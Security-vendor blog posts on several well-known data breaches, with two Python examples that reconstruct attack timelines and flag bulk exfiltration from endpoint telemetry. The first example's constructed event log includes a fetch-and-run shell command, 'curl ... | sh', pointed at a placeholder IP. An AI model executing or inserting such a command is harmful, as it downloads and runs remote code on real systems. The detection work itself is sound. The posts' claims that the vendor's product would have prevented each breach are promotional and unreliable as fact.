Charles Leaver – Utilizing Continuous Monitoring Will Enable Experian To Learn From Previous Mistakes

Written By Josh Applebaum And Presented By Charles Leaver Ziften CEO

Experian Needs To Learn From The Mistakes Of The Past And Implement A Continuous Monitoring Solution

Working in the security sector, I have always found my job hard to explain to the average person. Over the last few years that has changed. Sadly, a new data breach is disclosed every couple of weeks, with many more that are kept quiet. These breaches get front-page attention, and I can now explain to my friends what I do without losing them after a few sentences. Still, I wonder what we are actually learning from all this. As it turns out, many companies are not even learning from their own mistakes.

Experian, the international credit reporting firm, is a company with a lot to learn. A few months ago Experian disclosed that its servers had been breached and that customer data had been stolen. In announcing the breach, Experian assured customers that “our consumer credit database was not accessed in this event, and no payment card or banking info was taken.” Although Experian took care in its statement to reassure customers that their financial information had not been taken, it went on to list what had been taken: customers’ names, addresses, Social Security numbers, birth dates, driver’s license numbers, military ID numbers, passport numbers, and additional information used in T-Mobile’s own credit assessment. This is frightening for two reasons: first, the kind of data that was stolen; second, this is not the first time it has happened to Experian.

Although the criminals did not walk away with “payment card or banking information”, they did leave with exactly the personal data needed to open new credit card, banking, and other financial accounts in the victims’ names. That alone is reason for the affected T-Mobile customers to be concerned. But every Experian client should be a little nervous.

As it turns out, this is not the first time Experian’s servers have been compromised. In early 2014, T-Mobile announced that a “reasonably small” number of its customers had their personal details stolen when Experian’s servers were breached. Brian Krebs has a well-written post on how the attackers got into Experian the first time, so we will not go into much detail here. In that first breach, the attackers exploited a flaw in the company’s support ticket system, which had been left exposed without requiring a user to authenticate before using it. Now the frightening part: although it became widely known that the attackers had used a flaw in the support ticket system to gain access, that system was not shut down until right after the second breach.

It is hard to believe it was a coincidence that Experian decided to take down its support ticket system mere weeks after announcing it had been breached again. If it was not a coincidence, then let’s ask: what did Experian learn from the first breach, in which attackers got away with sensitive customer data? Companies that hold their customers’ sensitive information must be held accountable not only for protecting that data, but also, if they are breached, for closing the holes discovered while investigating the attack.

When companies investigate a breach (or a suspected breach) it is essential that they have access to historical data, so that the investigators can piece together how the attack unfolded. At Ziften, we provide a system that gives our customers a continuous, real-time view of everything that happens in their environment. In addition to real-time visibility for detecting attacks as they occur, our continuous monitoring service records all historical data so customers can “rewind the tape” and reconstruct exactly what happened in their environment, however far back they need to look. With this visibility it becomes possible not only to discover that a breach happened, but also why it happened, and to learn from past mistakes so they are not repeated.
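What “rewinding the tape” looks like in practice, as an added example that is not Ziften’s code: a recorder keeps every process start (with its parent) and every outbound connection, and the investigator starts from the one thing they noticed, a large upload, and walks backwards to the service that let the attacker in and forwards through everything that foothold spawned. The event schema, image paths, IP addresses and timestamps below are constructed for illustration.

```python
"""Rewind the tape: walk recorded endpoint events back from one finding to the
process that let the attacker in, then forward through everything that process
spawned.  Added example, not Ziften code; the event schema, image paths, IPs and
timestamps below are constructed for illustration."""
from collections import defaultdict

# Constructed endpoint telemetry in capture order.  A real recorder must key
# processes on (host, pid, start time) because pids are reused; this sample has
# no reuse, so (host, pid) is enough.
EVENTS = [
    {"t": 100, "type": "process", "host": "web01", "pid": 4001, "ppid": 1,
     "image": "/usr/sbin/httpd", "cmd": "httpd -k start"},
    {"t": 250, "type": "process", "host": "web01", "pid": 4123, "ppid": 4001,
     "image": "/usr/bin/php", "cmd": "php-cgi"},
    {"t": 251, "type": "process", "host": "web01", "pid": 4130, "ppid": 4123,
     "image": "/bin/sh", "cmd": "sh -c 'curl http://203.0.113.7/a.sh | sh'"},
    {"t": 252, "type": "process", "host": "web01", "pid": 4131, "ppid": 4130,
     "image": "/usr/bin/curl", "cmd": "curl http://203.0.113.7/a.sh"},
    {"t": 253, "type": "network", "host": "web01", "pid": 4131,
     "dst": "203.0.113.7", "dport": 80, "bytes_out": 310},
    {"t": 260, "type": "process", "host": "web01", "pid": 4140, "ppid": 4130,
     "image": "/usr/bin/python3", "cmd": "python3 /tmp/.x.py"},
    {"t": 900, "type": "network", "host": "web01", "pid": 4140,
     "dst": "203.0.113.7", "dport": 443, "bytes_out": 598_000_000},
]

# A web service spawning one of these is where "serving pages" turned into "attacker has a shell".
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}


def process_index(events):
    """(host, pid) -> the process-start event for that pid."""
    return {(e["host"], e["pid"]): e for e in events if e["type"] == "process"}


def lineage(events, host, pid):
    """Ancestor chain root-first, following ppid until the recorder has no
    start event for the parent (e.g. init) or a cycle is detected."""
    procs = process_index(events)
    chain, seen, key = [], set(), (host, pid)
    while key in procs and key not in seen:
        seen.add(key)
        chain.append(procs[key])
        key = (host, procs[key]["ppid"])
    chain.reverse()
    return chain


def descendants(events, host, pid):
    """Set of pids in the subtree rooted at pid, pid included."""
    children = defaultdict(list)
    for e in events:
        if e["type"] == "process":
            children[(e["host"], e["ppid"])].append(e["pid"])
    found, stack = set(), [pid]
    while stack:
        p = stack.pop()
        if p not in found:
            found.add(p)
            stack.extend(children[(host, p)])
    return found


def timeline(events, host, pid):
    """Every recorded event, in capture order, from pid's subtree."""
    subtree = descendants(events, host, pid)
    return [e for e in events if e["host"] == host and e["pid"] in subtree]


def pivot(chain):
    """First shell in the ancestry, i.e. the point where a service started doing
    something a service should not.  Falls back to the queried process."""
    return next((e for e in chain if e["image"] in SHELLS), chain[-1] if chain else None)


def summarize(events, host, pid):
    """Answer the investigator's questions for one finding: how did it get here
    (chain), where did the attack start (pivot), and what left the host."""
    chain = lineage(events, host, pid)
    piv = pivot(chain)
    tl = timeline(events, host, piv["pid"]) if piv else []
    out = defaultdict(int)
    for e in tl:
        if e["type"] == "network":
            out[e["dst"]] += e["bytes_out"]
    return {"chain": [e["image"] for e in chain],
            "pivot": piv["cmd"] if piv else None,
            "first_t": tl[0]["t"] if tl else None,
            "bytes_out_by_dst": dict(out)}


if __name__ == "__main__":
    # Start from the finding an analyst would actually see: a 598 MB upload by pid 4140.
    for k, v in summarize(EVENTS, "web01", 4140).items():
        print(f"{k}: {v}")
```

Run as-is, the summary shows the chain httpd, php, sh, python3 (a web server that ends up running a shell is the “why”), the shell command as the pivot, the first event of the attack at t=251 rather than t=900 when the upload was noticed, and the total bytes sent to 203.0.113.7 including the small download that fetched the tooling. None of that is recoverable if the recorder only keeps the last few hours, which is the point of retaining history.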


Charles Leaver – It Is Time To Learn Lessons From The UCLA Health Data Breach

Written By Craig Hand And Presented By Ziften CEO Charles Leaver

UCLA Health Data Breach Likely Due To Inferior Security

UCLA Health announced on July 17, 2015 that it was the victim of a health data breach affecting as many as 4.5 million patients of the four hospitals it operates in Southern California. According to UCLA Health officials, Personally Identifiable Information (PII) and Protected Health Information (PHI) was accessed, but there is no evidence yet that the data was taken. The records went back as far as 1990. Officials also stated that there was no evidence, at this time, that any credit card or financial data was accessed.

“At this time” is the key phrase here. The information accessed (or possibly taken; it is impossible to know at this point) is useful for essentially the whole life of the person, and possibly beyond it. The data available to the criminals included names, addresses, telephone numbers, Social Security numbers, medical conditions, medications prescribed, medical procedures performed, and test results.

Little is known about this breach, like so many others we hear about but never get real details on. UCLA Health detected unusual activity in parts of its network in October 2014 (although the access may have begun a month earlier) and immediately contacted the FBI. Not until May 2015, a full seven months later, did investigators conclude that a data breach had occurred. Once again, officials claim the attackers were probably highly sophisticated and based outside the country. Finally, the public got to hear about the breach a further two months later, on July 17, 2015.

It has been said many times that we as security professionals have to be right 100% of the time, while the bad guys only need to find the 1% we could not get right. Based on what we know about the breach, the bottom line is that UCLA Health had poor security practices. One indicator is the simple fact that the data accessed was not encrypted. Encryption at rest does not stop an attacker who has compromised an application that legitimately decrypts the data, but leaving the records in the clear removes even that hurdle. HIPAA has been in force for some time, and UCLA is a renowned bastion of higher education, yet it still failed to protect data in the most basic ways. The claim that the attackers were highly sophisticated is also suspect, since no real evidence has been disclosed. After all, when was the last time a breached organization said the attack was not “advanced”? Even if they do have such evidence, we as members of the public will not get to see it and verify it.

Since not enough details about the breach have been disclosed, it is hard to say whether any product would have helped detect it sooner rather than later. However, if the breach began with malware delivered to and launched by a user on the UCLA Health network, the likelihood that Ziften could have helped detect the malware, and possibly stop it, is reasonably high. Ziften could also have alerted on suspicious, unknown, or known malware, as well as on any communications the malware made in order to spread internally or to exfiltrate data to an external host.

When are we going to learn? As we all know, it is not a matter of if, but when, an organization will be breached. Smart organizations prepare for the inevitable with detection and response systems that limit the damage.


Charles Leaver – Adult Friend Finder Data Leak Preventable With Superior Endpoint Security

Written By Chuck McAuley And Presented By Charles Leaver Ziften CEO

Endpoint Security Is The Best Friend For Adult Friend Finder

Adult Friend Finder, an online “dating service”, and its affiliates were hacked in April. The leaked data included credit card numbers, usernames, passwords, birth dates, physical addresses and personal, you know, preferences. What is often not highlighted in these cases is the monetary value of such a breach. Many would argue that an email address and its associated data are of little worth. But in the same way that metadata collection gives the NSA insight, this kind of information gives attackers plenty of leverage to use against the public. Spear phishing becomes much easier when attackers have not only an email address but also location, language, and race. The source IP addresses collected can even narrow a victim down to an approximate street-level location.

The attack method used in this case was not disclosed, but it is reasonable to assume it involved some form of SQL injection or similar, in which the data is pulled out of the back-end database through a flaw in the web application. Another possible route is hijacked SSH keys from a compromised admin account or a GitHub repository, but those tend to be secondary in most cases. Either way, the database dump itself is 570 MB, and assuming the data was exfiltrated in a few large transactions, it would have been very visible at the network level (an attacker who trickles it out over days is a much harder case). That is, if Adult Friend Finder had been using a system that provided visibility into network traffic.

Ziften ZFlow™ provides network visibility, including into the cloud, to catch anomalous data transfers and attribute them to the specific executing process. In this case, the administrator would have had two chances to notice the anomaly: 1) at the database level, as the data was extracted; 2) at the web server level, where an unusual volume of traffic was sent to a single address. Organizations like Adult Friend Finder should get the endpoint and network visibility required to protect their customers’ personal data and “hook up” with a company like Ziften.
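The two checkpoints above, and the UCLA Health post’s point about alerting on a process that starts exfiltrating data to an external host, reduce to the same detection: per process, compare what left for each destination in the current window against that process’s own history. The following is an added example, not Ziften ZFlow; the flow-record shape (per-process byte counts per time window) and all of the sample hosts, addresses and byte counts are constructed.

```python
"""Flag a bulk dump at the two points where it is visible: the database server
handing the rows to the web tier and the web server pushing them to one outside
address.  Added example, not Ziften ZFlow; the flow-record shape (per-process
byte counts per time window) and all sample values are constructed."""
import statistics
from collections import defaultdict


def sample_flows():
    """Constructed per-process flow summaries: (window, host, process, dst, bytes_out).
    Windows 1-7 are routine.  In window 8 a 570 MB dump moves from mysqld on db01
    to the web server (10.0.0.11) and then out of httpd to 203.0.113.9."""
    flows = []
    for w in range(1, 9):
        for i in range(1, 6):  # httpd answering ordinary clients, 100 KB - 322 KB each
            flows.append((w, "web01", "httpd", f"198.51.100.{i}", 100_000 + 37_000 * ((w * i) % 7)))
        flows.append((w, "db01", "mysqld", "10.0.0.11", 3_000_000 + 250_000 * (w % 3)))
    flows.append((8, "db01", "mysqld", "10.0.0.11", 570_000_000))
    flows.append((8, "web01", "httpd", "203.0.113.9", 570_000_000))
    return flows


def per_dst_totals(flows):
    """(window, host, process, dst) -> bytes_out summed over the window."""
    totals = defaultdict(int)
    for w, host, proc, dst, b in flows:
        totals[(w, host, proc, dst)] += b
    return totals


def baseline(totals, host, proc, before_window):
    """Median of the per-destination totals this process produced in earlier
    windows.  Comparing per destination rather than per process is what makes
    one large transfer to a single address stand out from many small ones."""
    vals = [b for (w, h, p, _), b in totals.items()
            if h == host and p == proc and w < before_window]
    return statistics.median(vals) if vals else None


def flag_transfers(flows, window, k=20, floor=50_000_000):
    """(host, process, dst, bytes, baseline) for every destination in `window`
    that received more than k x the process's historical median and at least
    `floor` bytes.  The floor keeps a quiet process from alerting on a
    harmless 1 MB upload just because its median is a few kilobytes."""
    totals = per_dst_totals(flows)
    hits = []
    for (w, host, proc, dst), b in sorted(totals.items()):
        if w != window:
            continue
        base = baseline(totals, host, proc, window)
        if base is None:  # first window for this process: no history to compare
            continue
        if b >= floor and b > k * base:
            hits.append((host, proc, dst, b, base))
    return hits


if __name__ == "__main__":
    for host, proc, dst, b, base in flag_transfers(sample_flows(), window=8):
        print(f"{host}/{proc} -> {dst}: {b:,} bytes (median {base:,.0f})")
```

In window 8 both checkpoints fire: mysqld sending hundreds of times its usual volume to the web tier, and httpd sending 570 MB to one address it has never talked to, while the five routine client destinations stay silent. The attribution to a process is what makes the second alert actionable; a bare netflow record would only say the web server sent a lot of data, which it does all day. The known gap is the one the post itself assumes away: an attacker who keeps each window under `k` times the median and under the floor slips through, so a per-day cumulative cap per process and destination belongs alongside this check.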


Charles Leaver – A Personal Perspective On The Biometric Data Compromise From The OPM Breach

Written By Mike Hamilton And Presented By Ziften CEO Charles Leaver

Enhanced Security of Personal and Biometric Data Is Needed After OPM Breach

Recently, I had to go through a fairly extensive background check. It was one of those processes where you sign in to the portal, provide your Social Security number and a myriad of sensitive information about yourself and your family, and trust the government (and its contractors) to take care of that personal data.

When I got home the other night and sat down to start writing this article, I looked at the stack of mail on my desk and noticed one of those envelopes with the perforated edges that usually contain sensitive information.

Naturally, you have to open those envelopes. Sadly, at that moment all my worst fears became reality.

What I found was my very own letter explaining that essentially every sensitive piece of information one might want to know about me, along with similar details on 21 million other Americans, was accessed during the OPM breach.

Oh, and incidentally, there is the small matter of my biometric identity also having been compromised.

At this point, even though “federal experts” believe it is not a major issue, my iPhone disagrees with them. Bruce Schneier wrote an excellent piece on this, so I won’t belabor the points he makes. But at some point we all have to ask some tough questions:

When is this going to stop?

Who is accountable for stopping it?

Who is going to really stop it?

Who is going to be held responsible when breaches occur?

These kinds of attacks are why we at Ziften are so passionately building our next-generation security tools. While we as a security community may never completely stop or prevent these kinds of breaches, perhaps we can make them much harder and more time consuming. When you think about it, until the community says “we can’t take any more”, this is going to keep happening every day.

Charles Leaver – Endpoint Security From Ziften Could Have Prevented Data Breach At Ashley Madison

Written By Michael Vaughn And Presented By Charles Leaver Ziften CEO

Life is Too Short to Not Implement Endpoint Security.

Ashley Madison’s tagline is “Life is short. Have an affair.” Security falls very short at the company, however, as millions of customer records were published for the whole world to see in a recent attack. Publicly, there are only theories as to who exactly breached the scandalous operation. It could have been an inside job. Other parties, such as the hacking group calling itself Impact Team, have claimed responsibility for the attack on the red-lettered business. What is clear is the publicly published list of thirty-two million user identities. Furthermore, CEO Noel Biderman lost his job, and the company is facing an enormous number of lawsuits.

It has also come out that bots were chatting with users, and that only a small fraction of the accounts belonged to women. Almost comically, the site still states that it won a “Trusted Security Award” and offers complete discretion to its users. The claim of “Over 42,705,000 anonymous members!” on the home page is as shameful as the service it offers. The stolen user list is so easily accessible that third parties have already built interactive sites with the names and addresses of the exposed cheaters. Per Ashley Madison’s media page, they “right away implemented a comprehensive investigation making use of premier forensics experts and other security experts to determine the origin, nature, and scope of this incident.” If Ashley Madison had been more proactive in its approach to endpoint security, it could have been alerted to the breach and stopped it before data was taken.

Advanced endpoint security and forensic tools, such as those offered by Ziften, could have saved this company from the humiliation it has suffered. Not only could Ziften have alerted security leads to the suspicious network activity in the middle of the night of an attack, it could have blocked a range of actions against the database, all while letting the security team sleep a little better. Life is too short to let security problems keep you awake at night.